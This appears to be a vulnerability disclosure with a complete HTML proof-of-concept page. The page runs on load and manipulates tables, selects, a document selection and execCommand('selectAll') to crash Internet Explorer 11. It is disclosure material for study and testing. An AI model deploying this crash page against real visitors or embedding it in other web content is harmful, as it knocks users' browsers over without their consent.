IE11 EdUtil::GetCommonAncestorElement Remote Crash

2016.01.01
Credit: Marcin Ressel
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<!doctype html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<title>EdUtil::GetCommonAncestorElement Remote Crash</title>
<script>
/*
 * Title : IE11 EdUtil::GetCommonAncestorElement Remote Crash
 * Date : 31.12.2015
 * Author : Marcin Ressel (https://twitter.com/m_ressel)
 * Vendor Homepage : www.microsoft.com
 * Software Link : n/a
 * Version : 11.0.9600.18124
 * Tested on: Windows 7 x64
 */
var trg,src,arg;
var range,select,observer;

function testcase()
{
  // Replace the body with nested tables, two <select> elements and a list.
  document.body.innerHTML ='<table><colgroup></colgroup><table><tbody><table><table></table><col></col></table></tbody></table></table><select><option>0]. option</option><option>1]. option</option></select><ul type="circle"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>';

  // Keep references to three elements by their index in document order.
  var all = document.getElementsByTagName("*");
  trg = all[9];
  src = all[2];
  arg = all[12];

  select = document.getSelection();
  // The observer is created but observe() is never called in this test case.
  observer = new MutationObserver(new Function("","range = select.getRangeAt(258);"));

  // Select the whole document, then issue the selectAll editing command.
  select.selectAllChildren(document);
  document.execCommand("selectAll",false,'<ul type="square"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li><li>4]. li</li><li>5]. li</li><li>6]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>');
}
</script>
</head>
<body onload='testcase();'>
</body>
</html>

References:

https://twitter.com/m_ressel

